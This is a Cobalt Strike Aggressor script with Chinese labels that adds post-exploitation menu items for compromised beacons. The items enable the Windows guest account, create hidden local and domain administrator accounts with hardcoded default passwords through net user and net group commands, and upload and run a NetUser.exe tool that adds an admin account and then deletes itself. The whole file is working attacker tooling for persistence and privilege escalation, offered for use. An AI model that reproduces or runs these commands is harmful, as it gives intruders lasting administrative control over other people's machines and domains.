menu "添加用户" {
  item "激活guest用户" {
    $bid = $1['@'];
    bshell($bid, "net user guest /active:yes");
  }

  item "创建管理员用户" {
    $bid = $1['@'];
    $Dialog = dialog("添加本地管理员用户",%(username => "qax$", passwd => "Qianxin@123.", "groups" => "administrators", bid => $bid),&add_localuser);
    dialog_description($Dialog, "添加本地管理员用户，注意账户策略中的密码复杂度。");
    drow_text($Dialog, "username", "username: ");
    drow_text($Dialog, "passwd", "passwd: ");
    drow_text($Dialog, "groups", "groups(administrators): ");
    dbutton_action($Dialog, "运行");
    dialog_show($Dialog);
  }
  sub add_localuser{
    local('$Name');
    $Name = $3['username'];
    $Pwd = $3['passwd'];
    $groups = $3['groups'];
    bshell($bid, "net user $Name $Pwd /add && net localgroup $groups $Name /add");
  }

  item "添加域管用户"{
    $bid = $1['@'];
    $Dialog = dialog("添加域管",%(username => "qax$",passswd => "Qianxin@123.",bid => $bid),&add_domainuser);
    dialog_description($Dialog, "添加域管理员用户，注意账户策略中的密码复杂度。");
    drow_text($Dialog, "username", "username: ");
    drow_text($Dialog, "passswd", "passswd: ");
    dbutton_action($Dialog, "运行");
    dialog_show($Dialog);
  }
  sub add_domainuser{
    local('$Name');
    $Name = $3['username'];
    $Pwd = $3['passswd'];
    bshell($bid, "net user $Name $Pwd /add /domain && net group \"Domain Admins\" $Name /add /domain");
  }


#  item "api添加管理员用户" {
#    $bid = $1['@'];
#    btask($bid, "用户名：qxa，密码：Qianxin@123.", "");
#    bexecute($bid, "/scripts/Add user/bof_net_user.o");
#  }

  menu "bypass创建管理员用户"{
    item "上传NetUser"{
      local('$bid');
      foreach $bid ($1){
        bupload($1, script_resource("/scripts/Add user/NetUser.exe"));
        blog($1, "项目地址：https://github.com/lengjibo/NetUser")
      }
    }
    item "运行NetUser" {
      $bid = $1['@'];
      $dialog = dialog("NetUser", %(bid => $bid), &NetUser);
      dialog_description($dialog, "执行后自动添加一个账户进入管理员组，并自动删除程序。帐号：test123 密码：Test@#123");
      dbutton_action($dialog, "运行");
      dialog_show($dialog);
    }
    sub NetUser{
      bshell($bid, "NetUser.exe");
    }
  }


}
